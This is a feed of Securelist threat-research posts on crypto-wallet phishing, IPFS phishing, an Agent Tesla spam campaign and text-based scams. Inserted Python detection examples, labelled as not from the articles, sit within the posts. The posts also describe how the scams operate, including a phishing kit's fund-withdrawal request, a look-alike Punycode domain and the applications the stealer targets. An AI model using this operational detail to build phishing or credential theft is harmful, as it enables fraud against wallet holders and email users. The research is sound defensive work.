Spam and phishing mail – Securelist (https://securelist.com), feed generated Mon, 03 Jul 2023 11:49:25 +0000

Email crypto phishing scams: stealing from hot and cold crypto wallets
https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/
Wed, 05 Jul 2023 10:00:09 +0000

The higher the global popularity of cryptocurrencies and the more new ways of storing them, the wider the arsenal of tools used by malicious actors who are after digital money. Scammers tailor the complexity of technology they use and the thoroughness of their efforts to imitate legitimate websites to how well the target is protected and how large the amount is that they can steal if successful. This story covers two fundamentally different methods of email attacks on the two most popular ways of storing cryptocurrency: hot and cold wallets.

Hot wallets and attempts at hacking them

A hot wallet is a cryptocurrency wallet with permanent access to the internet. This is essentially any online service that provides cryptocurrency storage, ranging from crypto exchanges to specialized apps.

Hot wallets are a highly popular crypto storage option. This can be explained by the simplicity of creating one (registering with a wallet service is all you need to do) and the ease of withdrawing and converting funds. The popularity and simplicity of hot wallets make them cybercriminals’ main target. However, for this reason, and due to the fact that hot wallets are always online, they are rarely used for storing large amounts. Hence, cybercriminals have little motivation to invest heavily into phishing campaigns, and so the techniques used in email attacks on hot wallets are hardly ever original or complex. In fact, they look rather primitive and target mostly unsophisticated users.

A typical phishing scam aimed at a hot wallet user works as follows: hackers send email messages addressed as coming from a well-known crypto exchange and requesting the user to confirm a transaction or verify their wallet again.

Sample phishing email that targets Coinbase users

After the user clicks the link, they are redirected to a page where they are asked to enter their seed phrase. A seed phrase (recovery phrase) is a sequence of 12 (less commonly 24) words for recovering access to a crypto wallet. This is essentially the main password for the wallet. The seed phrase can be used for gaining or recovering access to the user’s account and making any transactions. The seed phrase cannot be changed or recovered: by misplacing it, the user risks losing access to their wallet for good, and by giving it to scammers, permanently compromising their account.

Seed phrase entry page

If the user enters the seed phrase on a fake web page, scammers get full access to the wallet and the ability to siphon all of the funds to their own addresses.

Fairly simple and devoid of software or social engineering tricks, scams like these typically target non-technical users. A seed phrase entry form usually has a stripped-down look: just an input field and a crypto exchange logo.

Phishing scams that target cold wallets

A cold wallet (cold storage) is a wallet without a permanent connection to the internet, like a dedicated device or even just a private key written on a slip of paper. Hardware storage is the most common type of cold wallet. As these devices are offline most of the time, and remote access is impossible, users tend to store significantly larger amounts on these. That said, it would be erroneous to believe that a hardware wallet cannot be compromised without stealing it, or at least getting physical access to it. As is the case with hot wallets, scammers use social engineering techniques to get to users’ funds. We spotted an email campaign recently that was specifically aimed at the owners of hardware cold wallets.

This type of attack starts as a crypto email campaign: the user gets an email, addressed as being from the Ripple cryptocurrency exchange and offering to join a giveaway of XRP tokens, the platform’s internal cryptocurrency.

Phishing email pretending to be from Ripple cryptocurrency exchange

If the user clicks the link, they are presented with a blog page featuring a post that explains the rules of the “giveaway”. The post contains a direct link to “registration”.

Fake Ripple blog

Already at this point, the scam shows a few differences from mass attacks on hot wallets: instead of sending the user a link straight to a phishing page, the scammers use a more sophisticated immersion trick with a blog post. They also went so far as to meticulously copy the design of the Ripple website and register a domain name that was nearly identical to the exchange’s official domain. This is called a Punycode phishing attack. At first glance, the second-level domain is identical to the original one, but a closer look reveals that the letter “r” has been replaced with a Unicode character that carries a cedilla:

https://app[.]xn--ipple-4bb[.]net -> https://app[.]ŗipple[.]net/

Also, the scam site is hosted in the .net top-level domain, rather than .com, where the official Ripple website is located. This may not raise any red flags with the victim, though, as both domains are widely used by legitimate organizations.
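
As an added illustration (not code from the article), here is a Python check that decodes the xn-- label of a host like the one above and reports why it deserves suspicion: the decoded label collapses to a brand name once the cedilla is stripped, and the registrable domain is not the brand’s official one. The brand-to-official-domain table is an assumption made for the example.

```python
import codecs
import unicodedata
from urllib.parse import urlsplit

# Assumed brand table (not from the article): ASCII skeleton of the brand -> official domain.
OFFICIAL_DOMAINS = {
    "ripple": "ripple.com",
    "coinbase": "coinbase.com",
    "trezor": "trezor.io",
}


def decode_label(label: str) -> str:
    """Return the Unicode form of one DNS label, decoding xn-- (Punycode) labels."""
    if label.lower().startswith("xn--"):
        return codecs.decode(label[4:].encode("ascii"), "punycode")
    return label


def skeleton(text: str) -> str:
    """Collapse a label to the base letters a reader perceives.

    NFKD splits a precomposed letter such as U+0157 (r with cedilla) into
    'r' plus a combining cedilla; dropping the combining marks leaves 'r'.
    """
    decomposed = unicodedata.normalize("NFKD", text)
    return "".join(c for c in decomposed if not unicodedata.combining(c)).lower()


def check_host(url: str) -> dict:
    """Decode the host of a (possibly defanged, '[.]') URL and report look-alike findings."""
    host = urlsplit(url.replace("[.]", ".")).hostname or ""
    labels = [decode_label(label) for label in host.split(".")]
    unicode_host = ".".join(labels)
    findings = []
    if len(labels) < 2:
        return {"unicode_host": unicode_host, "suspicious": False, "findings": findings}
    sld, tld = labels[-2], labels[-1]
    registrable = f"{sld}.{tld}".lower()
    skel = skeleton(sld)
    # Finding 1: the second-level label only looks like its ASCII skeleton.
    if skel != sld.lower():
        findings.append(f"label '{sld}' is a look-alike of '{skel}'")
    # Finding 2: the skeleton names a known brand, but the registrable domain is not
    # the official one (this also catches the .net-instead-of-.com substitution).
    official = OFFICIAL_DOMAINS.get(skel)
    if official is not None and registrable != official:
        findings.append(f"'{registrable}' imitates '{skel}' but the official domain is '{official}'")
    return {"unicode_host": unicode_host, "suspicious": bool(findings), "findings": findings}
```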

After the user follows the link from the “blog” to the fake Ripple page, they are prompted to connect to the WebSocket address wss://s2.ripple.com.

Connection to the WebSocket address

Next, the user is prompted to enter the address of their XRP account.

Entering XRP account address

The website then offers to choose an authentication method for receiving the bonus tokens.

Choosing an authentication method

As you can see, hardware wallets are at the top of the list and are the option the scammers push. Selecting Trezor redirects the user to the official website trezor.io, which allows devices to be connected to web apps via the Trezor Connect API. The API is used to simplify transactions with the help of a hardware wallet. The scammers want the victim to connect to their website so they can withdraw the funds from the victim’s account.

When the user attempts to connect to the third-party website, Trezor Connect asks them to consent to anonymous collection of data and to confirm that they want to connect to the website. The address of the scam site is displayed in a Punycode view as: https://app[.]xn--ipple-4bb[.]net. The scammer’s hope is that the user misses the address, which is provided in small print on the side of the page.

Trezor Connect: confirming the connection to the scam site

Connection via Ledger is a lot like Trezor, but it uses the WebHID interface, with the other steps unchanged.

What happens after the user connects their hardware wallet? We had to explore the code of the phishing site just a bit to answer that question. The website is powered by an application written in Node.js. This uses two APIs:

  • wss://s2.ripple.com, the official WebSocket address for Ripple transactions
  • The phishing site API, for example: app[.]xn--ipple-4bb[.]net/api/v1/action

The scammers use these two APIs for interacting with the victim’s XRP account. The phishing site API talks to the WebSocket address, verifies account details and requests funds. For this purpose, the scammers spin up one-off intermediate wallets.

Withdrawal request:

{
  "command": "get_payment",
  "account": victim_address,
  "transactionType": "Payment"
}

Response and description:

{
  "success": true,
  "data": {
    "TransactionType": "Payment",
    "Account": victim_address,
    "Fee": "10",
    "Sequence": 391,
    "Destination": "rU53pnJzEv2mrtck…"*,
    "Flags": 2147483648,
    "Amount": "xxx",
    "LastLedgerSequence": 79548458
  }
}

* The scammers generate a new address every time

The intermediate account is used for just two things: to receive the victim’s funds and to forward these to the scammers’ permanent account. This helps to hide the final destination.
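
The fields in the Payment object above are the values a user should check on the device before approving a signature. As an added example (not code from the article or from the phishing kit), here is a Python review step that parses such a response and lists the red flags; the account and destination addresses and the Amount are placeholders, since the article obscures or truncates them.

```python
import json

XRP_DROPS = 1_000_000                 # 1 XRP = 1,000,000 drops
TF_FULLY_CANONICAL_SIG = 0x80000000   # 2147483648, the only bit set in the article's Flags

# Constructed response modelled on the one in the article. Account and Destination are
# placeholders (the article hides the victim address and truncates the destination) and
# Amount is assumed, since the article shows it as "xxx".
SAMPLE_RESPONSE = json.dumps({
    "success": True,
    "data": {
        "TransactionType": "Payment",
        "Account": "rVICTIMACCOUNTPLACEHOLDER",
        "Fee": "10",
        "Sequence": 391,
        "Destination": "rDESTINATIONPLACEHOLDER",
        "Flags": 2147483648,
        "Amount": "99990000",
        "LastLedgerSequence": 79548458,
    },
})


def drops_to_xrp(drops) -> float:
    """XRP amounts in a transaction are strings denominated in drops."""
    return int(drops) / XRP_DROPS


def review_payment(response: str, connected_account: str, balance_drops: int,
                   trusted_destinations: set) -> list:
    """Return the red flags a user should see before approving the signature on their device.

    An empty list means nothing in the transaction itself looks wrong; it does not vouch
    for the site that produced it.
    """
    tx = json.loads(response)["data"]
    red_flags = []
    if tx.get("TransactionType") != "Payment":
        return [f"unexpected transaction type {tx.get('TransactionType')!r}"]
    if tx.get("Account") != connected_account:
        red_flags.append("transaction spends from an account other than the connected one")
    destination = tx.get("Destination", "")
    if destination not in trusted_destinations:
        red_flags.append(f"destination {destination} is not one of your own addresses")
    amount = tx.get("Amount")
    if isinstance(amount, dict):
        # Issued (non-XRP) currencies are encoded as objects rather than drop strings.
        red_flags.append(f"payment is in issued currency {amount.get('currency')}, not XRP")
    else:
        total_drops = int(amount) + int(tx.get("Fee", "0"))
        if balance_drops and total_drops >= 0.9 * balance_drops:
            share = total_drops / balance_drops
            red_flags.append(f"{drops_to_xrp(amount)} XRP plus fee sweeps {share:.0%} of the balance")
    # Only tfFullyCanonicalSig is expected; any other bit deserves a look.
    unexpected_flags = int(tx.get("Flags", 0)) & ~TF_FULLY_CANONICAL_SIG
    if unexpected_flags:
        red_flags.append(f"unexpected Flags bits set: {unexpected_flags:#x}")
    return red_flags
```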

Statistics

In the spring of 2023, Kaspersky antispam solutions detected and blocked 85,362 scam emails targeting cryptocurrency users. Scam email campaigns peaked in March, with 34,644 messages. We blocked 19,902 emails in April and 30,816 in May.

Number of detected phishing emails targeting cryptocurrency users in March–May 2023

Conclusion

Scammers understand one thing just fine: the harder it is to get to the loot, the bigger it is likely to be. Therefore, attacks on hardware wallets, which many consider bullet-proof, use far more sophisticated tactics than those employed against the users of online crypto storage services. Although hardware wallets are indeed more secure than hot wallets, users should not lower their guard. Check every detail carefully before giving any website access to your wallet, and refuse to connect if anything smells fishy.

How scammers employ IPFS for email phishing
https://securelist.com/ipfs-phishing/109158/
Mon, 27 Mar 2023 08:00:48 +0000

The idea of creating Web 3.0 has been around since the end of the 2000s. The new version of the world wide web is supposed to repair the weak points of Web 2.0, some of which are: featureless content, prevalence of proprietary solutions, and lack of safety in a centralized user data storage environment, where a massive leak is likely should just one server be compromised. Web 3.0 is described as a decentralized and open internet — some of its features are already implemented in today’s digital world.

Unfortunately, the “new internet” will still remain a playground for criminals who will employ cutting-edge technologies for their old sport of data theft, financial machinations and the like. In this article, I will describe how they use one of the Web 3.0 technologies — the distributed file system IPFS — for email phishing attacks.

What is IPFS?

IPFS (InterPlanetary File System) is a peer-to-peer distributed file system enabling users around the world to exchange files. Unlike centralized systems, IPFS addresses content by unique content identifiers (CIDs), not by file paths. A CID is derived from the file’s hash value and then recorded in a distributed hash table, which also contains information on the file owner. The file itself resides on the computer of the user who “uploaded” it to IPFS, and is downloaded directly from that computer. The structure of IPFS is somewhat similar to the BitTorrent protocol which, too, is a distributed network where file exchange takes place directly between the users’ devices.

By default, uploading a file to IPFS or downloading it requires special software (an IPFS client). So that users can view the files residing in IPFS without installing any software, so-called gateways are provided. A gateway is in fact a server with access to IPFS. To open a file via a gateway, a URL is required, normally containing a gateway address, a reference to IPFS, and the file’s CID. URL formats can be quite different, for example:

  • https://gateway_address/ipfs/CID
  • https://CID.ipfs.gateway_address

Phishing and IPFS

In 2022, scammers began actively using IPFS for email phishing attacks. They would place HTML files containing a phishing form in IPFS and use gateways as proxies, so that victims could open the file, whether or not running an IPFS client on their devices. The scammers would include file access links via a gateway into phishing letters dispatched to would-be victims.

The use of a distributed file system allows attackers to cut back on phishing page hosting costs. Besides, you cannot delete files uploaded by third parties from IPFS. If somebody wants a file to disappear from the system completely, they can urge its owners to delete it, but the method will probably never work with cybercriminals anyway.

IPFS gateway providers attempt to combat IPFS phishing by regularly deleting links to fraudulent files.

Phishing page deletion notification

Yet detection and deletion of links at gateway level does not always happen as quickly as the blocking of a phishing website, cloud form, or document. We have observed URL addresses of IPFS files that first appeared in October 2022 and remain operational at the time of this writing.

Phishing letters containing IPFS links are hardly ever too original — they contain the typical phishing content the purpose of which is to obtain the victim’s account login and password.

Phishing letter with an IPFS link

It is a bit more interesting to examine the HTML pages the links lead to.

HTML page used for phishing

As can be seen on the screenshot above, the URL parameter contains the recipient’s e-mail address. Once it is modified, the page content will change too: the corporate logo on top of the phishing form and the email address entered into the login field. In this way, one link can be used in several phishing campaigns targeting different users — sometimes even in dozens of campaigns.

Phishing page modification

The logo replacement effect is achieved using simple JavaScript code. The script obtains the domain from the page’s URL parameter and substitutes it into the URL of a Google resource, from which a logo icon is then sourced.

Company logo substitution
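
The two gateway URL shapes listed under “What is IPFS?” and the personalised links just described can be recognised by a mail filter. The following Python code is an added example, not code from the article or from any IPFS project: it classifies a gateway link, extracts the CID and the recipient address carried in the URL, and groups links by CID so that one phishing file reused across many target domains stands out. The article does not name the URL parameter, so any query value (or fragment, as an assumption) that parses as an e-mail address is taken; the sample CIDs and URLs are constructed.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# CIDv0: 46-character base58 string starting with "Qm".
# CIDv1 as seen in subdomain gateways: lowercase base32 starting with "b".
CID_V0 = re.compile(r"^Qm[1-9A-HJ-NP-Za-km-z]{44}$")
CID_V1_B32 = re.compile(r"^b[a-z2-7]{50,}$")
EMAIL = re.compile(r"^[^@\s/]+@([^@\s/]+\.[a-z]{2,})$", re.IGNORECASE)


def looks_like_cid(value: str) -> bool:
    return bool(CID_V0.match(value) or CID_V1_B32.match(value.lower()))


def classify_ipfs_url(url: str) -> Optional[dict]:
    """Recognise the path-style and subdomain-style gateway links from the article.

    Returns None for URLs that are not IPFS gateway links. Defanged '[.]' is accepted.
    """
    parts = urlsplit(url.replace("[.]", "."))
    host = (parts.hostname or "").lower()
    segments = [s for s in parts.path.split("/") if s]
    labels = host.split(".")
    if len(segments) >= 2 and segments[0] == "ipfs" and looks_like_cid(segments[1]):
        style, gateway, cid = "path", host, segments[1]                    # https://gateway/ipfs/CID
    elif len(labels) >= 3 and labels[1] == "ipfs" and looks_like_cid(labels[0]):
        style, gateway, cid = "subdomain", ".".join(labels[2:]), labels[0]  # https://CID.ipfs.gateway
    else:
        return None
    # The recipient address travels in a URL parameter whose name the article does not
    # give, so every query value is tested; the fragment is included as an assumption.
    candidates = [v for values in parse_qs(parts.query).values() for v in values]
    if parts.fragment:
        candidates.append(unquote(parts.fragment))
    target, target_domain = None, None
    for value in candidates:
        match = EMAIL.match(value.strip())
        if match:
            target, target_domain = value.strip(), match.group(1).lower()
            break
    return {"style": style, "gateway": gateway, "cid": cid,
            "target": target, "target_domain": target_domain,
            "personalised": target is not None}


def targets_per_cid(urls: list) -> dict:
    """Group personalised gateway links by CID.

    Many distinct target domains behind one CID is the "one link, many campaigns"
    pattern the article describes: the same phishing file serving different victims.
    """
    grouped = {}
    for url in urls:
        info = classify_ipfs_url(url)
        if info and info["target_domain"]:
            grouped.setdefault(info["cid"], set()).add(info["target_domain"])
    return grouped
```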

Use of IPFS in targeted phishing attacks

The use of IPFS is not limited to mass mailing campaigns: it is used for complex targeted attacks too. Unlike the ordinary ones, targeted phishing campaigns are much better prepared, normally focusing on specific persons within the company, not just random users.

Targeted phishing with an IPFS link

In the two examples above, the attacks were leveled at corporate procurement departments, the letters purporting to come from sales managers of existing organizations. The phishing page itself lacks originality.

Phishing page used in a targeted attack

Statistics

In late 2022, we were observing 2–15 thousand IPFS phishing letters a day most of the time. But there were quieter days too: our systems registered only 637 such letters on December 1, and 937 on December 23. Starting this year, IPFS phishing began to grow in scale. We observed a few upsurges in January and February with over 24,000 letters a day — with peaks reaching 34–37 thousand a day. However, the flurry gradually died down by mid-February, with the number of attacks mostly returning to November and December levels.

Dynamics of the number of IPFS phishing attacks, November 2022 — February 2023

Yet it is worth noting that February turned out the busiest month in terms of IPFS phishing activity. In that month alone, we observed almost 400,000 letters — more than 20,000 above the January figure, and over 100,000 more than in November and December 2022.

IPFS phishing letters distribution by month, November 2022 — February 2023

Conclusion

Attackers have used and will continue to use cutting-edge technologies to reap profits. Of late, we observe an increase in the number of IPFS phishing attacks — both mass and targeted. The distributed file system allows scammers to save money on domain purchase. Plus, it is not easy to completely delete a file, although, there are attempts to combat fraud at IPFS gateway level. The good news is that anti-spam solutions detect and block links to phishing files in IPFS, just like any other phishing links. In particular, Kaspersky products employ a number of heuristics to detect IPFS phishing.

Mass email campaign with a pinch of targeted spam
https://securelist.com/agent-tesla-malicious-spam-campaign/107478/
Fri, 23 Sep 2022 08:00:13 +0000

Most mass malicious mailing campaigns are very primitive and hardly diverse, with the content limited to a few sentences inviting the user to download archives that supposedly contain some urgent bills or unpaid fines. The email messages may contain no signatures or logos, with typos and other errors being fairly common. These mailings may target individual users or large corporations, with no significant differences in message content.

Example of a mass malicious mailing message

Things have started to change recently, though, as spammers began employing techniques that are typical of targeted attacks. In particular, they have been sending emails in the name of real companies, copying the senders’ writing style and signatures.

Customer email with an Easter egg inside

We discovered a noteworthy email message recently. In it, someone posing as a Malaysian prospect and using a fairly odd variety of English asks the recipient to review some customer requirements and get back with the requested documents. The general format complies with corporate correspondence standards: there is a logo that belongs to a real company and a signature that features sender details. Overall, the request looks legit, while the linguistic errors can easily be attributed to the sender being a non-native speaker.

The email from the "Malaysian prospect," with a malicious attachment

The only thing about the email that smells fishy is the sender’s address (newsletter@trade***.com), as “newsletter” is typically used for news, not procurement. Besides, the sender’s domain name is different from the company name in the logo.

In another email, a purported Bulgarian customer inquires about the availability of some products and offers to discuss the details of a deal. The requested products list is said to be in the attachment, as in the previous specimen. The sender’s address, similarly suspicious, belongs to a Greek, not Bulgarian, domain, which apparently has no relation to the company whose name is used by the spammers.

The email from the "Bulgarian customer," with a malicious attachment

What these two messages have in common is both the mailing scenario and the fact that neither looks generated by a machine. Looking closely at the message headers, we noticed that they shared a structure: a sequence of headers, MSGID format and email client were the same. Besides, the messages originated within a limited range of IP addresses. This suggested that they were part of one massive email campaign.

Comparing the message headers of two malicious emails

Unlike the IP addresses and headers, the content varies. The spammers have been sending malicious archives addressed from a large number of companies, with the “request” text changing as well. This suggests that the operators invested quite some effort into preparations, which is uncharacteristic of this kind of campaign.

Statistics

From April till August, our systems detected 739,749 messages attributed to the campaign. The email activity peaked in June, with 194,100 detected messages, dropping to 178,510 in July and to 104,991 in August.

Malicious email dynamics, April through August 2022

Payload: Agent Tesla malware

We studied the contents of the archives attached to the emails and found them to contain one of two unique files that belong to the same family. It is the widespread Agent Tesla malware, written in .NET and known since 2014. Its main objective is to fetch passwords stored in browsers and other applications and forward these to the operator. While Agent Tesla most frequently forwards data via email, there are versions that drop the stolen data into a Telegram secret chat, onto a website operated by the attackers or onto an FTP server. The Agent Tesla version being spread by the campaign at hand is one of the latest, capable of extracting passwords from the following applications.

  • Browsers: Chrome, Edge, Firefox, Opera, 360 Browser, 7Star, Amigo, Brave, CentBrowser, Chedot, Chromium, Citrio, Cốc Cốc, Comodo Dragon, CoolNovo, Coowon, Elements Browser, Epic Privacy, Iridium Browser, Kometa, Liebao Browser, Orbitum, QIP Surf, Sleipnir 6, Sputnik, Torch Browser, Uran, Vivaldi, Yandex.Browser, QQ Browser, Cyberfox, IceDragon, Pale Moon, SeaMonkey, Waterfox, IceCat, K-Meleon.
  • Email clients: Becky!, Opera Mail, Foxmail, Thunderbird, Claws, Outlook, The Bat!, eM Client, Mailbird, IncrediMail, Postbox, Pocomail
  • FTP/SCP clients: WinSCP, WS_FTP, FTPGetter, SmartFTP, FTP Navigator, Core FTP
  • Databases: MySQL Workbench
  • Virtual network computing clients: RealVNC, TightVNC, TigerVNC, UltraVNC, Windows RDP, cFTP
  • VPN clients: NordVPN, OpenVPN
  • Instant messaging programs: Psi/Psi+, Trillian

Agent Tesla is also capable of taking screenshots, intercepting clipboard contents and logging keystrokes.

Agent Tesla attack geography

Agent Tesla targets users around the world. According to our observations, the malware’s activity from May till August 2022 was the highest in Europe, Asia and Latin America. The largest number of victims (20,941) was recorded in Mexico. It was followed by Spain, with 18,090 users’ devices registering infection attempts, and Germany, where 14,880 users were affected.

Ten most-attacked countries by number of affected users:

Country/territory       Users affected
Mexico                  20,941
Spain                   18,090
Germany                 14,880
Turkey                  13,326
Russian Federation      12,739
Italy                   12,480
Malaysia                10,092
Vietnam                  9,760
Brazil                   8,851
Portugal                 8,739

Conclusion

The spam campaign we discovered is clear proof that cybercriminals can invest significant effort even in mass attacks. The email messages we studied appear to be high-quality imitations of business inquiries by real companies, only given away by the inappropriate sender addresses. In all likelihood, these emails were composed and sent out manually. That said, our systems were detecting more than a hundred thousand of these emails each month, which targeted organizations all around the world.

The payload spread by the attackers is capable of stealing login data from an imposing number of applications. The data may be offered for sale on darkweb forums or used in targeted attacks against organizations. Agent Tesla is notably a long-known stealer, detected by most cybersecurity products. It is assigned the verdict Trojan-PSW.MSIL.Agensla by Kaspersky products.

Indicators of compromise

MD5 hashes of attached archives:


MD5 hashes of the executables and details of attackers’ email accounts used for sending and receiving data stolen by the sample:


Text-based fraud: from 419 scams to vishing
https://securelist.com/mail-text-scam/106926/
Mon, 11 Jul 2022 08:00:53 +0000

E-mail scammers typically combine social engineering with technical skills to bypass spam filters and persuade the recipient to reply. But there is a specific class of attacks that is technically stuck somewhere in the late 90s/early 00s, in the era of CRT monitors and sluggish internet: we are talking about text-based fraud. Attackers of this kind do not carefully imitate the appearance of e-mails from major companies, do not redirect the victim to a fake site, do not obfuscate links and do not even use them. Their main tool and method of persuasion is old-fashioned text. And it works surprisingly often.

Types of text-based fraud

In terms of topics and techniques, text-based fraud can be divided into several types:

  • Dating scams
  • 419 scams
  • Blackmailing and extortion
  • Vishing

Let’s take a look at these types of scams and see why they work.

Dating scams

This category includes messages seemingly from attractive women (more rarely men) looking for a “serious relationship.” For extra plausibility, scammers add biographical details and/or photographs of their bait, including immodest ones. The latter are usually downloaded from open sources.

Example of a dating scam e-mail

Attackers can also create fake profiles in social networks and instant messengers to make the scheme more persuasive. If the potential victim responds, they are added as friends and start to receive individual treatment. The interaction can last from several days to several months, and includes not only messages, but also phone and even video calls.

Fraudsters can monetize their lonely-heart character in several ways. For instance, early on in the communication, they might ask for small amounts of money or gifts as a sign of commitment. Another variant is, after a long virtual communication, to ask for a large sum to visit the victim, have an urgent surgery, etc. One more scheme, quite common lately, is when the “partner” promises to send the victim an expensive gift or cash by courier from abroad. After some time, the “courier” gets in touch and asks the victim to pay for shipping, customs duties, etc.

Note that scammers get acquainted with victims not only by e-mail. These schemes are utilized on dating sites, social networks and instant messengers. Moreover, the latter two are often the main channel for communicating with the victim, regardless of how contact was initially made. But mass mailings are still more convenient to send out by e-mail, since accounts in social networks, messengers, etc., are quickly blocked due to spam.

Statistics

Dating scams are the least common type of message-based fraud. From March to June 2022, we found 49,536 messages from people “looking for a relationship,” dropping to 1,998 e-mails for the whole of June. This may be because scammers actively use other communication channels to get to know their victims and establish a trusting relationship.

Number of detected messages offering to date, March–June 2022

419 scams: “rich uncles” and Covid payments

419 scams are one of the oldest types of text-based fraud. In the classic 419 letter, the recipient is informed by a “lawyer” or other “official” that a deceased relative or dying benefactor has bequeathed a huge fortune to them. All the victim needs to do is fill out a short questionnaire, pay a fee for administration and other formalities, and claim their millions. Often, the scammers do not mention the fee straight up but invite the victim to make contact by replying to the e-mail to find out more about their “inheritance.” In any case, once the fee is paid, they vanish.

419 e-mails are often crawling with grammar and spelling mistakes. This may be to mask words and expressions that could activate spam filters, or it could be that the attackers have a poor grasp of the victim’s language.

Classical 419 scam with inheritance

419 letters are still popular with attackers, who send them regularly and in large numbers: our solutions detect hundreds of thousands of such messages every month. Often, instead of deceased rich relatives, they exploit more topical themes. For example, alongside the increased attention to the Syrian war, cybercriminals were sending e-mails supposedly from people inside the country wanting to transfer large sums abroad.

419 scam with transactions

Lately, unexpected transactions have been doing the rounds, as well as payments to victims — of Covid, the Ukraine crisis and, ironically, frauds.

419 scam with compensation

Another subspecies of the 419 scam is lottery winnings in which the “winner” did not participate. To make the scheme more credible, scammers usually claim that, say, a giveaway was held for taxpayers in a particular region or country, for owners of a particular e-mail domain, etc. Unlike Covid-19 compensation, such mailings are not new but they never lose popularity.

Lottery fraud

From a technical standpoint, not much has changed in the 419 scam — for the most part, messages are sent from free webmail accounts (Google Mail, Yahoo Mail, etc.).

To ask for details, send a form, etc., attackers usually encourage victims to contact them by mail. Since mail services can block addresses known as spam sources, they often give a different address for replies, one that is not flagged.

Statistics

From February to June, our solutions detected 1.8 million 419 scam e-mails. Their number began to rise in late February, peaking at 657,014 in March. In April, on the contrary, spammer activity decreased by more than half.

Number of 419 e-mails detected, February–June 2022

Blackmail scam

Whereas scammers use the above methods to exploit victims’ greed, blackmailers play on their fear. Typically, cybercriminals claim that they have come into possession of the target’s personal information, which, for a modest payment, they promise not to send to family members or post online. As a rule, they do not provide any actual evidence of data theft, since they did not in fact steal anything — this is how scammers differ from ransomware groups, which do indeed steal or encrypt files using malware.

Blackmail scams really came into their own with the popularization of cryptocurrencies: the blockchain’s anonymity eliminates the need for complex money-laundering chains.

Extortion e-mail: the scammer claims to have hacked into the recipient's mailbox

Extortionists attack both individuals and companies but employ different approaches. Individuals are most often threatened with publication of personal data allegedly stolen by hacking into their computer or mailbox. Scammers might also mention intimate photos or videos that they claim to have recorded through the device’s webcam. It’s quite possible they pinched this idea from an episode of Black Mirror.

Extortion e-mail threatening to post “intimate” content allegedly stolen from the user and containing their e-mail address in the From header

From a technical point of view, this type of fraud typically features e-mail address spoofing. Attackers substitute the recipient’s address in the From header, seemingly confirming mailbox hacking.
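
The self-addressed From header is cheap to spot on the receiving side. As an added example (not code from the article), here is a Python check that flags a message whose From address is also a recipient while the domain’s own authentication results do not vouch for it, which is the spoofing pattern rather than evidence of a mailbox takeover. The raw message is constructed for the example and its addresses and authentication results are made up.

```python
import email
import re
from email.message import Message
from email.utils import getaddresses, parseaddr

# Constructed message (assumption): From carries the recipient's own address, as the
# article describes, and the receiving server's Authentication-Results shows the checks failing.
SAMPLE_EXTORTION = """\
Return-Path: <bounce@unrelated-host.example>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=unrelated-host.example; dkim=none; dmarc=fail header.from=example.com
From: victim@example.com
To: victim@example.com
Subject: I have your private videos

Pay 0.3 BTC within 48 hours or the files go to your contacts.
"""

AUTH_PAIR = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)


def parse_auth_results(msg: Message) -> dict:
    """Collect method=result pairs from every Authentication-Results header."""
    results = {}
    for header in msg.get_all("Authentication-Results", []):
        for method, result in AUTH_PAIR.findall(header):
            results.setdefault(method.lower(), result.lower())
    return results


def self_addressed_spoof(raw: str) -> dict:
    """Decide whether a message 'from yourself' is spoofed rather than sent from your mailbox."""
    msg = email.message_from_string(raw)
    from_addr = parseaddr(msg.get("From", ""))[1].lower()
    recipients = {addr.lower() for _, addr in
                  getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))}
    auth = parse_auth_results(msg)
    return_path = parseaddr(msg.get("Return-Path", ""))[1].lower()
    from_domain = from_addr.rsplit("@", 1)[-1]
    rp_domain = return_path.rsplit("@", 1)[-1] if return_path else ""
    self_addressed = from_addr in recipients
    # A genuine message from the user's own domain would pass DMARC; a spoofed one fails
    # or is never evaluated, and its envelope sender usually belongs to another domain.
    not_authenticated = auth.get("dmarc") != "pass"
    envelope_mismatch = bool(rp_domain) and rp_domain != from_domain
    return {
        "self_addressed": self_addressed,
        "auth": auth,
        "envelope_mismatch": envelope_mismatch,
        "spoof_suspected": self_addressed and (not_authenticated or envelope_mismatch),
    }
```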

E-mails targeting individuals may also threaten administrative or criminal penalties, although such messages are far less common than ones about hacking.

Companies, meanwhile, can be threatened with bomb scare messages. In 2020 and 2021, extortionists actively sent out e-mails in the name of renowned APT and ransomware groups, promising to carry out an attack unless payment was made forthwith. Unlike the majority of their promises, attackers sometimes follow through on this one.

Statistics

There are significantly more extortion e-mails in mail traffic than other forms of text-based scam. For instance, from March to June, we detected more than 12 million blackmail messages.

Number of extortionate e-mails detected, March–June 2022

Vishing: scammers’ hotline

Vishing is short for voice phishing. As you might guess from the name, this is when attackers make contact with the potential victim via voice communication. How does this relate to text-based scams? In the past few years, vishers have been sending out mass e-mails asking the recipient to call back on their phone number, that is, spamming is the first step of the operation.

Vishing can target both individuals and companies. From individuals, scammers try to extract confidential data, persuade them to install software for remote access, or get them to transfer money to the scammers’ account. In the case of a targeted company’s employee, attackers may convince them to transfer money to a specific bank account or grant access to a corporate account.

Fake PayPal notification about a large purchase. To cancel the order, the victim is asked to urgently write or call the support service

Most often, vishing e-mails masquerade as notifications from some service: this can be a large online store, a payment system, or, for example, subscription-based software.

Fake Geek Squad notification. For more information, the victim is asked to call the specified number

Typically, the e-mails are composed so as to create the impression of being generated automatically. Most likely, this is so that the victim does not try to reply to the message but uses the vishers’ contact details.

To find out exactly how attackers achieve their goal, that is, to fish (or vish) out data or money, I called a couple of numbers provided in such e-mails. In both cases, after a short introductory dialog, a confident voice at the other end asked me to open a browser window and spelled out a URL (anydesk.com) for me to download the Anydesk remote access program. In response to my question about such a long unsubscribing process, the first scammer, absolutely unfazed, replied that they needed to log in to my bank account to confirm and then cancel the transaction. When I replied that I did not use online banking, the scammer hung up. The second turned out to be less talkative and did not give any interesting details.

On the one hand, this scheme seems too clunky to be widely used. On the other, communication via various channels and the attackers’ imitation of expertise can inspire more trust in the user than just an e-mail with a phishing link.

Statistics

From March to June 2022, we found 347,141 e-mails prompting the recipient to call the scammers back by phone. We saw a slight drop in this type of scam in April, after which the number of e-mails began to grow again.

Number of detected vishing e-mails, March–June 2022

Conclusion

